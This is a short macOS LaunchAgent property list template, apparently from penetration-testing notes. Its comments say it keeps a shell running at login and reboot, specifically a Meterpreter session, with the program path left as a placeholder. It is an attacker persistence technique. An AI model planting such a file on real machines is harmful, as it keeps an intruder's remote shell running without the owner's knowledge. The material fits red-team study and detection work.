<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
	<dict>
		<key>Label</key>
		<string>com.example.shell</string>
		<key>Program</key>
		<string>/path/to/the/file</string>
		<!-- Execute the file when this plist file is loaded -->
		<key>RunAtLoad</key>
		<true/>
		<!-- Keep the shell alive when there is network connection  -->
		<key>KeepAlive</key>
		<true/>
		<key>WorkingDirectory</key>
		<!-- Files in /var/tmp survives reboot -->
		<string>/var/tmp</string>
	</dict>
</plist>


<!-- Store under ~/Library/LaunchAgents so the metepreter start when the user login -->

